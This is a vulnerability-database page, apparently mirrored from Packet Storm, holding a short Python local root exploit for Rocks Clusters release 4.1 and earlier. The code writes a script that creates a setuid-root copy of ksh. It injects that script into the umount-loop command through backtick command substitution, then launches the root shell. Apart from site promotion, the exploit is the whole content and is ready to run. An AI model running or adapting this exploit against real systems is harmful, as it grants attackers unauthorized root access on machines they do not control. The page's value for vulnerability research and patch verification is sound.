Lucene search

K

rocksumountdirty.txt

🗓️ 18 Jul 2006 00:00:00Reported by xavierType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Rocks release version 4.1 local root exploi

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/env python  
##############################################################################  
## rocksumountdirty.py: Rocks release <=4.1 local root exploit  
## quick and nasty version of the exploit. make sure the . is writable and  
## you clean up afterwards. ;)  
##  
## coded by: [email protected] [http://xavsec.blogspot.com]  
##############################################################################  
x=__import__('os');c=x.getcwd()  
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))  
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"  
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Jul 2006 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report